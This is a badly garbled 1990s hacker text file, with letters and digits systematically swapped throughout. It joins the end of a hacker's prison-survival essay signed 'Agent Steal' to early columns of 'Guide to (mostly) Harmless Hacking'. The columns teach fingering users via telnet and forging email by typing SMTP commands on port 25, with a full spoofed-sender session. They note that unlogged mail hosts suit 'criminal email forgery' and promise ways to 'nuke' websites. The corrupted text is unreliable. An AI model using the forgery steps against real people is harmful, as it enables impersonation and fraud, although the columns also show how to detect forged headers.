drugs& *s far as ra.e goes( .ick your friends carefully and stick with them& *nd always( always( be res.ectful& 3<en if the guy is a fucking idiot !and most inmates are$( say e'cuse me& 6y final .iece of .rison eti@uette ad<ice would be to ne<er take your inmate .roblems to :the man: !.rison staff$& 2es.ite the fact that most e<eryone in .rison snitched on their co?defendants at trial( there is no e'cuse for being a .rison rat& #h e rules are set by the .risoners themsel<es& 1f someone ste.s out of line there will likely be another inmate who will be ha..y to knock him back& 1n some .risons inmates are so afraid of being labeled a rat that they refuse to be seen talking alone with a .rison staff member& 1 should close this .aragra.h by stating that this bit of eti@uette is routinely ignored as other inmates will snitch on you for any reason whatsoe<er& +rison is a strange en<ironment& H& 241"G #163 ;ou can make what you want to out of .rison& Some .eo.le sit around and do do.e all day& 4thers immerse themsel<es in a routine of work and e'ercise& 1

studied technology and music& 5egardless( .risons are no longer a .lace of rehabilitation& #hey ser<e only to .unish and conditions are only going to worsen& #he effect is that angry( uneducated( and un.roducti<e inmates are being released back into society& While 1 was incarcerated in 95I9E( the .rison band .rogram was still in o.eration& 1 .layed drums for two different .rison bands& 1t really hel.ed .ass the time and when 1 get out 1 will continue with my career in music& "ow the .rogram has been canceled( all because some senator wanted to be seen as being tough on crime& Bills were .assed in /ongress& #he cable #C is gone( .ornogra.hy mags are no longer .ermitted( and the weight .iles are being remo<ed& *ll this means is that .risoners will ha<e m ore s.are time on their hands( and so more guards will ha<e to be hired to watch the .risoners& 1 don't want to get started on this sub=ect& 3ssentially what 1'm saying is make something out of your time& Study( get into a routine and before you know you 'll be going home( and a better .erson on to. of it& G& 21S/1+71"*5; */#14"S What fun is it if you go to .rison and don't get into some mischief? Well( 1'm ha..y to say the only :shots: !<iolations$ 1 e<er recei<ed were for ha<ing a friend .lace a call with his three?way calling for me !you can't call e<eryone collect$( and drinking homemade wine& _?$ #he .rison occasionally monitors your .hone calls and on the se<en or eight hundredth time 1 made a three?way 1 got caught& 6y .unishment was ten hours of e'tra duty !cleaning u.$& 4ther .unishments for shots include loss of .hone use( loss of commissary( loss of <isits( and getting thrown in the hole& Shots can also increase your security le<el and can get you transferred to a higher le<el institution& 1f you find yourself ha<ing trouble in this area you may want to .ick u. t he book( :How to win .rison disci.linary hearings:( by *lan +armelee( -ME?%-D?-DK5& H& *261"1S#5*#1C3 53632; 1f you ha<e a disagreement with the way staff is handling your case !and you will$ or another com.laint( there is an administrati<e remedy .rocedure& Hirst you must try to resol<e it informally& #hen you can file a form B+?9& #he B+? 9 goes to the warden& *fter that you can file a B+?,M which goes to the region& Hinally( a B+?,, goes to the "ational B4+ Head@uarters !/entral 4ffice$& #he whole .rocedure is a =oke and takes about si' months to com.lete& 2elay and con@uer is the B4+ motto& *fter you c om.lete the remedy .rocess to no a<ail( you may file your action in a ci<il court& 1n some

e'treme cases you may take your case directly to the courts without e'hausting the remedy .rocess& *gain( the :+risoners Self?Hel. 7itigation 6anual: co<ers this @u ite well& 6y best ad<ice with this remedy nonsense is to kee. your re@uest brief( clear( concise and only ask for one s.ecific thing .er form& 0sually if you :got it coming: you will get it& 1f you don't( or if the B4+ can find any reason to deny your re@uest( they will& Hor this reason 1 often took my .roblems outside the .rison from the start& 1f it was a substantial enough issue 1 would inform the media( the director of the B4+( all three of my attorneys( my =udge and the */70& 4ften this worked& 1t always .isse d them off& But( alas 1'm a man of .rinci.le and if you de.ri<e me of my rights 1'm going to raise hell& 1n the .ast 1 might ha<e resorted to hacker tactics( like disru.ting the B4+'s entire communication system bringing it crashing down But&&&1'm rehabilitated now& 1ncidently( most B4+ officials and inmates ha<e no conce.t of the kind of ha<oc a hacker can wield on an indi<iduals life& So until some hacker shows the B4+ which end is u. you will ha<e to acce.t the fact most e<eryone you meet in .rison will ha<e only nominal res.ect for you& 2eal with it( you're not in cybers.ace anymore& 1& +51S4" 4HH1/1*7S #here are two ty.es( dumb and dumber& 1'<e had res.ect for se<eral but 1'<e ne<er met one that im.ressed me as being .articularly talented in a way other than following orders& #y.ically you will find staff that are either =ust doing their =ob( or staff that is determined to ad<ance their career& #he latter take their =obs and themsel<es way too seriously& #hey don't get anywhere by being nice to inmates so they are often @uite curt& 3'?military and law enforcement wannabes are common.lace& *ll in all they're a .ain in the ass but easy to deal with& *nyone who has e<er been down !incarcerated$ for awhile knows it's best to kee. a low .rofile& 1f they don't know you by name you're in good sha.e& 4ne of the .roblems that com.uter hackers will encounter with .rison staff is fear andIor resentment& 1f you are a .retentious articulate educated white boy like myself you would be wise to act a little stu.id& #hese .eo.le don't want to res.ect yo u and some of them will hate e<erything that you stand for& 6any dislike all inmates to begin with& *nd the conce.t of you someday ha<ing a great =ob and being successful bothers them& 1t's all a rather bi>arre

en<ironment where e<eryone seems to hate the ir =obs& 1 guess 1'<e led a sheltered life& Before 1 mo<e on( sometimes there will be certain staff members( like your /ase 6anager( that will ha<e a substantial amount of control o<er your situation& #he best way to deal with the .erson is to stay out of their way& Be .olite( don't file grie<ances against them and ho.e that they will take care of you when it comes time& 1f this doesn't seem to work( then you need to be a total .ain in the ass and ride them with e<ery .ossible re@uest you can muster& 1t's es.ecially hel.ful if you ha<e outsi de .eo.le willing to make calls& Strong media attention will usually( at the <ery least( make the .rison do what they are su..osed to do& 1f you ha<e recei<ed a lot of bad .ress( this could be a disad<antage& 1f you care continues to be a .roblem( the .r ison will transfer you to another facility where you are more likely to get a break& *ll in all how you choose to deal with staff is often a difficult decision& 6y ad<ice is that unless you are really getting screwed o<er or really hate the .rison you are in( don't rock the boat& R& #H3 H473 Segregation sucks( but chances are you will find yourself there at some .oint and usually for the most ridiculous of reasons& Sometimes you will wind u. there because of what someone else did& #he hole is a E' ' ,M' concrete room with a steel bed and steel toilet& ;our .ri<ileges will <ary( but at first you get nothing but a shower e<ery cou.le of days& "aturally they feed you but( it's ne<er enough( and it's often cold& With no snacks you often find yourself @uite hungry in?between meals& #here is nothing to do there e'ce.t read and ho.efully some guard has been kind enough to throw you some old no<el& 2isci.linary actions will land you in the hole for ty.ically a week or two& 1n some cases you might get stuck there for a month or three& 1t de.ends on the shot and on the 7ieutenant that sent you there& Sometimes .eo.le ne<er lea<e the hole&&&& 8& G442 #163 ;ou get 5G days .er year off of your sentence for good beha<ior& 1f anyone tells you that a bill is going to be .assed to gi<e ,MD days( they are lying& 5G days a year works out to ,5P and you ha<e to do something significant to =ustify getting that taken away& #he B4+ has come u. with the most com.licated and ridiculous way to calculate how much good time you ha<e

earned& #hey ha<e a book about three inches thick that discusses how to calculate your e'act release date& 1 studied the book intensely and came to the conclusion that the only .ur.ose it ser<es is to co<ertly steal a few days of good time from you& Go figure& 7& H*7HW*; H40S3 *ll :eligible: inmates are to ser<e the last ,MP of their sentence !not to e'ceed si' months$ in a /ommunity /orrections /enter !///$& *t the ///( which is nothing more than a large house in a bad .art of town( you are to find a =ob in the communit y and s.end your e<enings and nights at the ///& ;ou ha<e to gi<e -5P of the gross amount of your check to the /// to .ay for all of your e'.enses( unless you are a rare Hederal .risoner sentenced to ser<e all of your time at the /// in which case it is , MP& #hey will breathalyse and urinanalyse you routinely to make sure you are not ha<ing too much fun& 1f you're a good little hacker you'll get a weekend .ass so you can stay out all night& 6ost ///s will transfer you to home confinement status after a few weeks& #his means you can mo<e into your own .lace( !if they a..ro<e it$ but still ha<e to be in for the e<enings& #hey check u. on you by .hone& *nd no( you are not allowed call forwarding( silly rabbit& 6& S0+35C1S32 5373*S3 Rust when you think the fun is all o<er( after you are released from .rison or the ///( you will be re@uired to re.ort to a +robation 4fficer& Hor the ne't % to 5 years you will be on Su.er<ised 5elease& #he go<ernment abolished .arole( thereby .re<enting con<icts from getting out of .rison early& 2es.ite this they still want to kee. tabs on you for awhile& Su.er<ised 5elease( in my o.inion( is nothing more than e'tended .unishment& ;ou are a not a free man able to tra<el and work as you .lease& *ll of your acti<ities will ha<e to be .resented to your +robation 4fficer !+&4&$& *nd .robation is essentially what Su.er<ised 5elease is& ;our +&4& can <iolate you for any technical <iolations and send you back to .rison for se<eral months( or o<er a year& 1f you ha<e *"; history of drug use you will be re@uired to submit to random !weekly$ urinalyses& 1f you come u. dirty it's back to the =oint& *s a hacker you may find that your access to work with( or .ossession of com.uter e@ui.ment may be restricted& While this may sound .ragmatic to the .ublic( in .ractice it ser<es no other .ur.ose that to .unish and limit a

former hacker's ability t o su..ort himself& With com.uters at libraries( co.y sho.s( schools( and <irtually e<erywhere( it's much like restricting someone who used a car to get to and from a bank robbery to not e<er dri<e again& 1f a hacker is .redis.osed to hacking he's going to be able to do it with or without restrictions& 1n reality many hackers don't e<en need a com.uter to achie<e their goals& *s you .robably know a .hone and a little social engineering go a long way& But with any luck you will be assigned a reasonable +&4& and you will stay out of trouble& 1f you gi<e your +&4& no cause to kee. an eye on you( you may find the reins loosening u.& ;ou may also be able to ha<e your Su.er<ised 5elease terminated ea rly by the court& *fter a year or so( with good cause( and all of your go<ernment debts .aid( it might be .lausible& Hire an attorney( file a motion& Hor many con<icts Su.er<ised 5elease is sim.ly too much like being in .rison& Hor those it is best to <iolate( go back to .rison for a few months( and ho.e the =udge terminates their Su.er<ised 5elease& *lthough the =udge may continue your su.er<is ion( heIshe ty.ically will not& "& S066*5; What a long strange tri. it's been& 1 ha<e a great deal of mi'ed emotions about my whole ordeal& 1 can howe<er( say that 1 H*C3 benefitted from my incarceration& Howe<er( it certainly was not on the behalf of how 1 was handled by the go<ernment& "o ( des.ite their efforts to kick me when 1 was down( use me( turn their backs after 1 had assisted them( and in general( =ust <iolate my rights( 1 was still able to emerge better educated than when 1 went in& But frankly( my release from .rison was =ust in the nick of time& #he long term effects of incarceration and stress were cree.ing u. on me( and 1 could see .rison conditions were worsening& 1t's hard to e'.ress the .oignancy of the situation but the ma=ority of those incarcerated feel that if drastic changes are not made *merica is due for some serious turmoil( .erha.s e<en a ci<il war& ;es( the criminal =ustice system is that screwed u.& #he "ation's thirst for <engeance on criminals is leading us into a <icious feedback loo. of crime and .unishment( and once again crime& Suite sim.ly( the system is not working& 6y .ur.ose in writing this article was not to send any kind of message& 1'm not telling you how not to get caught and 1'm not telling you to sto. hacking& 1 wrote this sim.ly because 1 feel l ike 1 owe it to whome<er might get use of it& Hor some strange reason 1 am oddly com.elled to tell you what ha..ened to me& +erha.s this is some kind or thera.y( .erha.s it's =ust

my ego( .erha.s 1 =ust want to hel. some .oor ,D?year?old hacker who really doesn't know what he is getting himself in to& Whate<er the reason( 1 =ust sat down one day and started writing& 1f there is a central theme to this article it would be how ugly your world can become& 4nce you get grabbed by the law( sucked into their <acuum( and they shine the s.otlight on you( there will be little you can do to .rotect yourself& #he <ultures and .redators will try to .ick what they can off of you& 1t's o.en season for the 0&S& *ttorneys( your attorney( other inmates( and .rison officials& ;ou become fair game& 2efending yourself from all of these forces will re@uire all of your wits( all of your resources( and occasionally your fists& Hurthering the humiliation( the .ress( as a general rule( will not be concerned with .resenting the truth& #hey will .rint what suits them and often omit many rele<ant facts& 1f you ha<e read any of the 5 books 1 am co<ered in you will no doubt ha<e a rather =aded o.inion of me& 7et me assure you that if you met me today you would @uickly see that 1 am @uite likable and not the <illain many !es.ecially Ron 7ittman$ ha<e made me out to be& ;ou may not agree with how 1 li<ed my life( but you wouldn't ha<e any trouble understanding why 1 chose to li<e it that way& Granted 1'<e made my mistakes( growing u. has been a long road for me& "e<ertheless( 1 ha<e no shortage of good friends& Hriends that 1 am immensely loyal to& But if you belie<e e<erything y ou read you'd ha<e the im.ression that 6itnick is a <indicti<e loser( +oulsen a furti<e stalker( and 1 a two faced rat& *ll of those assessments would be incorrect& So much for first im.ressions& 1 =ust ho.e 1 was able to enlighten you and in some way to hel. you make the right choice& Whether it's .rotecting yourself from what could be a traumatic life altering e'.erience( or com.elling you to focus your com.uter skills on other a<enues( it's im.ortant for you to know the .rogram( the language( and the rules& See you in the mo<ies *gent Steal ,99K /ontents of Colume ,:

Hacking ti. of this column: how to finger a user <ia telnet& How to forge email How finger can be used to crack into an 1nternet host& How get 0senet s.ammers kicked off their 1S+s How get email s.ammers kicked off their 1S+s& How to nuke offensi<e Web sites& How to Horge 3mail 0sing 3udora +ro FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G Col& , "umber , Hacking ti. of this column: how to finger a user <ia telnet& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF Hacking& #he word con=ures u. e<il com.uter geniuses .lotting the downfall of ci<ili>ation while s@uirreling away billions in electronically stolen funds in an *ntigua bank& But 1 define hacking as taking a .layful( ad<enturous a..roach to com.uters& Hackers don't go by the book& We fool around and try odd things( and when we stumble across something entertaining we tell our friends about it& Some of us may be crooks( but more often we are good guys( or at least harmless& Hurthermore( hacking is sur.risingly easy& 1bll gi<e you a chance to .ro<e it to yourself( today But regardless of why you want to be a hacker( it is definitely a way to ha<e fun( im.ress your buddies( and get dates& 1f you are a female hacker you become totally irresistible to all men& #ake my word for it AB2 #his column can become your gateway into this world& 1n fact( after reading =ust this first Guide to !mostly$ Harmless Hacking( you will be able to .ull off a stunt that will im.ress the a<erage guy or gal unluckyBHBHBHBHBHBHBH fortunate enough to get collared by you at a .arty& So what do you need to become a hacker? Before 1 tell you( howe<er( 1 am going to sub=ect you to a rant&

Ha<e you e<er .osted a message to a news grou. or email list de<oted to hacking? ;ou said something like `What do 1 need to become a hacker?a right? Betcha you wonbt try )that) again 1t gi<es you an education in what `flamea means( right? ;es( some of these %l,te ty.es like to flame the newbies& #hey act like they were born clutching a 0ni' manual in one hand and a #/+I1+ s.ecification document in the other and anyone who knows less is scum& ))))))))))))))))))))) "ewbie note: %l,t%( %,%%K( etc& all mean `elite&a #he idea is to take either the word `elitea or `eleeta and substitute numbers for some or all the letters& We also like >s& Hacker dMMd> do this sorK of th,ng lMt>& )))))))))))))))))))) "ow maybe you were making a sincere call for hel.& But there is a reason many hackers are @uick to flame strangers who ask for hel.& What we worry about is the kind of guy who says( :1 want to become a hacker& But 1 )don't) want to learn .rogramming and o.erating systems& Gimme some .asswords( dMMd> ;eah( and credit card numbers : Honest( 1 ha<e seen this sort of .ost in hacker grou.s& +ost something like this and you are likely to wake u. the ne't morning to disco<er your email bo' filled with %(MMM messages from email discussion grou.s on agricultural irrigation( .roctology( collectors of Hranklin 6int doo?dads( etc& 3tc&( etc&( etc&&&&arrrgghhhh #he reason we worry about wannabe hackers is that it is .ossible to break into other .eo.lebs com.uters and do serious damage e<en if you are almost totally ignorant& How can a clueless newbie trash other .eo.lebs com.uters? 3asy& #here are .ublic H#+ and Web sites on the 1nternet that offer canned hacking .rograms& #hanks to these canned tools( many of the `hackersa you read about getting busted are in fact clueless newbies&

#his column will teach you how to do real( yet legal and harmless hacking( without resorting to these hacking tools& But 1 wonbt teach you how to harm other .eo.lebs com.uters& 4r e<en how to break in where you donbt belong& )))))))))))))))))))))))))))))) ;ou can go to =ail ti.: 3<en if you do no harm( if you break into a .ortion of a com.uter that is not o.en to the .ublic( you ha<e committed a crime& 1f you telnet across a state line to break in( you ha<e committed a federal felony& ))))))))))))))))))))))))))))))))))))) 1 will focus on hacking the 1nternet& #he reason is that each com.uter on the 1nternet has some sort of .ublic connections with the rest of the "et& What this means is that if you use the right commands( you can )legally) access these com.uters& #hat( of course( is what you already do when you <isit a Web site& But 1 will show you how to access and use 1nternet host com.uters in ways that most .eo.le didnbt know were .ossible& Hurthermore( these are )fun) hacks& 1n fact( soon you will be learning hacks that shed light on how other .eo.le !"ot you( right? +romise?$ may crack into the non?.ublic .arts of hosts& *nd ?? these are hacks that anyone can do& But( there is one thing you really need to get& 1t will make hacking infinitely easier: * SH377 *//40"# * `shell accounta is an 1nternet account in which your com.uter becomes a terminal of one of your 1S+bs host com.uters& 4nce you are in the `shella you can gi<e commands to the 0ni' o.erating system =ust like you were sitting there in front of one of your 1S+bs hosts& Warning: the tech su..ort .erson at your 1S+ may tell you that you ha<e a `shell accounta when you really donbt& 6any 1S+s donbt really like shell accounts( either& Guess why? 1f you donbt ha<e a shell account( you canbt hack But you can easily tell if it is a real shell account& Hirst( you should use a `terminal emulation .rograma to log on& ;ou will need a .rogram that allows

you to imitate a C# ,MM terminal& 1f you ha<e Windows %&, or Windows 95( a C# ,MM terminal .rogram is included as one of your accessory .rogram& *ny good 1S+ will allow you to try it out for a few days with a guest account& Get one and then try out a few 0ni' commands to make sure it is really a shell account& ;ou donbt know 0ni'? 1f you are serious about understanding hacking( youbll need some good reference books& "o( 1 don't mean the kind with breathless titles like `Secrets of Su.er hacker&a 1b<e bought too many of that kind of book& #hey are full of hot air and thin on how?to& Serious hackers study books on: a$ 0ni'& 1 like :#he 0ni' /om.anion: by Harley Hahn& b$ Shells& 1 like :7earning the Bash Shell: by /ameron "ewham and Bill 5osenblatt& * `shella is the command interface between you and the 0ni' o.erating system& c$ #/+I1+( which is the set of .rotocols that make the 1nternet work& 1 like :#/+I1+ for 2ummies: by 6arshall Wilensky and /andace 7eiden& 48( rant is o<er& #ime to hack How would you like to start your hacking career with one of the sim.lest( yet .otentially hairy( hacks of the 1nternet? Here it comes: telnet to a finger .ort& Ha<e you e<er used the finger command before? Hinger will sometimes tell you a bunch of stuff about other .eo.le on the 1nternet& "ormally you would =ust enter the command: finger RoeFSchmoeJHubar&com But instead of Roe Schmoe( you .ut in the email address of someone you would like to check out& Hor e'am.le( my email address is cmeinelJtechbroker&com& So to finger me( gi<e the command: finger cmeinelJtechbroker&com "ow this command may tell you something( or it may fail with a message such as `access denied&a But there is a more elite way to finger .eo.le& ;ou can gi<e the command:

telnet llama&swc.&com K9 What this command has =ust done is let you get on a com.uter with an 1nternet address of llama&swc.&com through its .ort K9 ?? without gi<ing it a .assword& But the .rogram that llama and many other 1nternet hosts are running will usually allow you to gi<e only 4"3 command before automatically closing the connection& 6ake that command: cmeinel #his will tell you a hacker secret about why .ort K9 and its finger .rograms are way more significant than you might think& 4r( heck( maybe something else if the friendly neighborhood hacker is still .lanting insulting messages in my files& "ow( for an e'tra hacking bonus( try telnetting to some other .orts& Hor e'am.le: telnet kitsune&swc.&com ,% #hat will gi<e you the time and date here in "ew 6e'ico( and: telnet slug&swc.&com ,9 Will show you a good time 48( 1'm signing off for this column& *nd 1 .romise to tell you more about what the big deal is o<er telnetting to finger ?? but later& Ha..y hacking ))))))))))))))))))))))))))))))))))))))))))))))))))))))) Want to share some kewl hacker stu.h? #ell me 1bm terrific? Hlame me? Hor the first two( 1bm at cmeinelJtechbroker&com& +lease direct flames to de<InullJtechbroker&com& Ha..y hacking G0123 #4 !mostly$ H*5673SS H*/81"G Col& , "umber -

1n this issue we learn how to forge email ?? and how to s.ot forgeries& 1 .romise( this hack is s.ectacularly easy FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF Heroic Hacking in Half an Hour How would you like to totally blow away your friends? 48( what is the hairiest thing you hear that su.er hackers do? 1t's gaining unauthori>ed access to a com.uter( right? So how would you like to be able to gain access and run a .rogram on the almost any of the millions of com.uters hooked u. to the 1nternet? How would you like to access these 1nternet com.uters in the same way as the most notorious hacker in history: 5obert 6orris 1t was his `6orris Worma which took down the 1nternet in ,99M& 4f course( the flaw he e'.loited to fill u. ,MP of the com.uters on the 1nternet with his self?mailing <irus has been fi'ed now ?? on most 1nternet hosts& But that same feature of the 1nternet still has lots of fun and games and bugs left in it& 1n fact( what we are about to learn is the first ste. of se<eral of the most common ways that hackers break into .ri<ate areas of unsus.ecting com.uters& But 1bm not going to teach you to break into .ri<ate .arts of com.uters& 1t sounds too slea>y& Besides( 1 am allergic to =ail& So what you are about to learn is legal( harmless( yet still lots of fun& "o .ulling the blinds and swearing blood oaths among your buddies who will witness you doing this hack& But ?? to do this hack( you need an on?line ser<ice which allows you to telnet to a s.ecific .ort on an 1nternet host& "etcom( for e'am.le( will let you get away with this& But /om.user<e( *merica 4nline and many other 1nternet Ser<ice +ro<iders !1S+s$ are such good nannies that they will shelter you from this tem.tation& But your best way to do this stu.h is with a SH377 *//40"# 1f you donbt ha<e one yet( get it now

))))))))))))))))))))))))))))))))))) "ewbie note 9,A * shell account is an 1nternet account that lets you gi<e 0ni' commands& 0ni' is a lot like 24S& ;ou get a .rom.t on your screen and ty.e out commands& 0ni' is the language of the 1nternet& 1f you want to be a serious hacker( you ha<e to learn 0ni'& )))))))))))))))))))))))))))) 3<en if you ha<e ne<er telnetted before( this hack is su.er sim.le& 1n fact( e<en though what you are about to learn will look like hacking of the most heroic sort( you can master it in half an hour ?? or less& *nd you only need to memori>e )two) commands& #o find out whether your 1nternet ser<ice .ro<ider will let you do this stu.h( try this command: telnet callisto&unm&edu -5 #his is a com.uter at the 0ni<ersity of "ew 6e'ico& 6y /om.user<e account gets the <a.ors when 1 try this& 1t sim.ly crashes out of telnet without so much as a :tsk( tsk&: But at least today "etcom will let me do this command& *nd =ust about any chea. :shell account: offered by a fly?by?night 1nternet ser<ice .ro<ider will let you do this& 6any college accounts will let you get away with this( too& )))))))))))))))))))))))))))))) "ewbie note 9-: How to Get Shell *ccounts #ry your yellow .ages .hone book& 7ook under 1nternet& /all and ask for a `shell account&a #heybll usually say( `Sure( can do&a But lots of times they are lying& #hey think you are too dumb to know what a real shell account is& 4r the under.aid .erson you talk with doesnbt ha<e a clue& #he way around this is to ask for a free tem.orary guest account& *ny worthwhile 1S+ will gi<e you a test dri<e& #hen try out todaybs hack& )))))))))))))))))))))))))))))))

48( let's assume that you ha<e an account that lets you telnet some.lace serious& So let's get back to this command: telnet callisto&unm&edu -5 1f you ha<e e<er done telnet before( you .robably =ust .ut in the name of the com.uter you .lanned to <isit( but didn't add in any numbers afterward& But those numbers afterward are what makes the first distinction between the good( boring 1nternet citi>en and someone slaloming down the sli..ery slo.e of hackerdom& What that -5 means is that you are commanding telnet to take you to a s.ecific .ort on your intended <ictim( er( com.uter& ))))))))))))))))))))))))))))))))))) "ewbie note 9%: +orts * com.uter .ort is a .lace where information goes in or out of it& 4n your home com.uter( e'am.les of .orts are your monitor( which sends information out( your keyboard and mouse( which send information in( and your modem( which sends information both out and in& But an 1nternet host com.uter such as callisto&unm&edu has many more .orts than a ty.ical home com.uter& #hese .orts are identified by numbers& "ow these are not all .hysical .orts( like a keyboard or 5S-%- serial .ort !for your modem$& #hey are <irtual !software$ .orts& ))))))))))))))))))))))))))))))))))) But there is .hun in that .ort -5& 1ncredible .hun& ;ou see( whene<er you telnet to a com.uter's .ort -5( you will get one of two results: once in awhile( a message saying :access denied: as you hit a firewall& But( more often than not( you get something like this: #rying ,-9&-G&9E&,M&&& /onnected to callisto&unm&edu& 3sca.e character is 'BZ'& --M callisto&unm&edu Smail%&,&-D&, 9G, ready at Hri( ,- Rul 9E ,-:,K 62# Hey( get a look at this 1t didn't ask us to log in& 1t =ust says&&&ready "otice it is running Smail%&,&-D&,( a .rogram used to com.ose and send email&

4hmigosh( what do we do now? Well( if you really want to look so.histicated( the ne't thing you do is ask callisto&unm&edu to tell you what commands you can use& 1n general( when you get on a strange com.uter( at least one of three commands will get you information: :hel.(: :?:( or :man&: 1n this case 1 ty.e in: hel. &&& and this is what 1 get -5M #he following S6#+ commands are recogni>ed: -5M -5M H374 hostname startu. and gi<e your hostname -5M 6*17 H546:^sender addressV start transaction from sender -5M 5/+# #4:^reci.ient addressV name reci.ient for message -5M C5H; ^addressV <erify deli<erability of address -5M 3U+" ^addressV e'.and mailing list address -5M 2*#* start te't of mail message -5M 5S3# reset state( dro. transaction -5M "44+ do nothing -5M 23B0G Yle<elZ set debugging le<el(default , -5M H37+ .roduce this hel. message -5M S01# close S6#+ connection -5M -5M #he normal se@uence of e<ents in sending a message is to state the -5M sender address with a 6*17 H546 command( gi<e the reci.ients with -5M as many 5/+# #4 commands as are re@uired !one address .er command$ -5M and then to s.ecify the mail message te't after the 2*#* command& -5M 6ulti.le messages may be s.ecified& 3nd the last one with a S01#& Getting this list of commands is .retty nifty& 1t makes you look really kewl because you know how to get the com.uter to tell you how to hack it& *nd it means that all you ha<e to memori>e is the :telnet ^hostnameV -5 : and :hel.: commands& Hor the rest( you can sim.ly check u. on the commands while on?line& So e<en if your memory is as bad as mine( you really can learn and memori>e this hack in only half an hour& Heck( maybe half a minute& 48( so what do we do with these commands? ;u.( you figured it out( this is a <ery( <ery .rimiti<e email .rogram& *nd guess why you can get on it without

logging in? Guess why it was the .oint of <ulnerability that allowed 5obert 6orris to crash the 1nternet? +ort -5 mo<es email from one node to the ne't across the 1nternet& 1t automatically takes incoming email and if the email doesn't belong to someone with an email address on that com.uter( it sends it on to the ne't com.uter on the net( e<entually to wend its way to the .erson to who this email belongs& Sometimes email will go directly from sender to reci.ient( but if you email to someone far away( email may go through se<eral com.uters& #here are millions of com.uters on the 1nternet that forward email& *nd you can get access to almost any one of these com.uters without a .assword Hurthermore( as you will soon learn( it is easy to get the 1nternet addresses of these millions of com.uters& Some of these com.uters ha<e <ery good security( making it hard to ha<e serious fun with them& But others ha<e <ery little security& 4ne of the =oys of hacking is e'.loring these com.uters to find ones that suit ones fancy& 48( so now that we are in 6orris Worm country( what can we do with it? )))))))))))))))))))))))))))))))) 3<il Genius note: 6orris used the `23B0Ga command& 2onbt try this at home& "owadays if you find a .rogram running on .ort -5 with the 23B0G command( it is .robably a tra.& #rust me& )))))))))))))))))))))))))))))))) Well( here's what 1 did& !6y commands ha<e no number in front of them( whereas the com.uterbs res.onses are .refi'ed by numbers&$ helo santaJnorth&.ole&org -5M callisto&unm&edu Hello santaJnorth&.ole&org mail from:santaJnorth&.ole&org -5M ^santaJnorth&.ole&orgV &&& Sender 4kay rc.t to:cmeinelJnmia&com -5M ^cmeinelJnmia&comV &&& 5eci.ient 4kay data %5G 3nter mail( end with :&: on a line by itself 1t works

& -5M 6ail acce.ted What ha..ened here is that 1 sent some fake email to myself& "ow let's take a look at what 1 got in my mailbo'( showing the com.lete header: Here's what 1 saw using the free <ersion of 3udora: U +4+% 5c.t: cmeinelJsocrates #his line tells us that U?+4+% is the .rogram of my 1S+ that recei<ed my email( and that my incoming email is handled by the com.uter Socrates& ))))))))))))))))))))))))))))) 3<il Genius #i.: email which comes into your email reading .rogram is handled by .ort ,,M& #ry telnetting there someday& But usually +4+( the .rogram running on ,,M( wonbt gi<e you hel. with its commands and boots you off the minute you make a misste.& ))))))))))))))))))))))))))))) 5eturn +ath: ^santaJnorth&.ole&orgV #his line abo<e is my fake email address& *..arently Hrom: santaJnorth&.ole&org 2ate: Hri( ,- Rul 9E ,-:,D 62# But note that the header lines abo<e say :*..arently?Hrom: #his is im.ortant because it alerts me to the fact that this is fake mail& *..arently #o: cmeinelJnmia&com U Status: 1t works "ow here is an interesting fact& 2ifferent email reading .rograms show different headers& So how good your fake email is de.ends on .art on what email .rogram is used to read it& Here's what +ine( an email .rogram that runs on 0ni' systems( shows with this same email: 5eturn +ath: ^santaJnorth&.ole&orgV

5ecei<ed: from callisto&unm&edu by nmia&com with smt. !7inu' Smail%&,&-D&, 9G$ id mMuem.G MMM7HG/A Hri( ,- Rul 9E ,-:-M 62# #his identifies the com.uter on which 1 ran the smail .rogram& 1t also tells what <ersion of the smail .rogram was running& *..arently Hrom: santaJnorth&.ole&org *nd here is the :a..arently?from: message again& So both +ine and 3udora show this is fake mail& 5ecei<ed: from santaJnorth&.ole&org by callisto&unm&edu with smt. !Smail%&,&-D&, 9G,$ id mMuemn7 MMMMHH/A Hri( ,- Rul 9E ,-:,D 62# 6essage 1d: ^mMuemn7 MMMMHH/Jcallisto&unm&eduV 4h( oh "ot only does it show that it may be fake mail ?? it has a message 12 #his means that somewhere on /allisto there will be a log of message 12s telling who has used .ort -5 and the smail .rogram& ;ou see( e<ery time someone logs on to .ort -5 on that com.uter( their email address is left behind on the log along with that message 12& 2ate: Hri( ,- Rul 9E ,-:,D 62# *..arently Hrom: santaJnorth&.ole&com *..arently #o: cmeinelJnmia&com 1t works 1f someone were to use this email .rogram to do a dastardly deed( that message 12 is what will .ut the narcs on his or her tail& So if you want to fake email( it is harder to get away with it if you send it to someone using +ine than if they use the free <ersion of 3udora& !;ou can tell what email .rogram a .erson uses by looking at the header of their email&$ But ?? the email .rograms on .ort -5 of many 1nternet hosts are not as well defended as callisto&unm&edu& Some are better defended( and some are not defended at all& 1n fact( it is .ossible that some may not e<en kee. a log of users of .ort -5( making them .erfect for criminal email forgery&

So =ust because you get email with .erfect?looking headers doesnbt mean it is genuine& ;ou need some sort of encry.ted <erification scheme to be almost certain email is genuine& )))))))))))))))))))))))))))))))))))))))))) ;ou can go to =ail note: 1f you are contem.lating using fake email to commit a crime( think again& 1f you are reading this you donbt know enough to forge email well enough to elude arrest& ))))))))))))))))))))))))))))))))))))))))))) Here is an e'am.le of a different email .rogram( sendmail& #his will gi<e you an idea of the small <ariations you'll run into with this hack& Herebs my command: telnet ns&1nterlink&"et -5 #he com.uter answers: #rying ,9D&,ED&K%&D&&& /onnected to "S&1"#3571"8&"3#& 3sca.e character is 'BZ'& --M 1nter7ink&"3# Sendmail *1U %&-I0/B 5&EGIG&M% ready at Hri( ,- Rul ,99E ,5:G5 #V ???????????????????????????????????????????????????????????????????????? #ransfer interru.ted Jnorth&.ole&org *nd it res.onds: -5M 1nter7ink&"3# Hello santaJnorth&.ole&org !.lato&nmia&com$ 4h( oh #his sendmail <ersion isn't fooled at all See how it .uts :!.lato&nmia&com$: ?? the com.uter 1 was using for this hack ?? in there =ust to let me know it knows from what com.uter 1'<e telnetted? But what the heck( all 1nternet hosts know that kind of info& 1'll =ust bull ahead and send fake mail

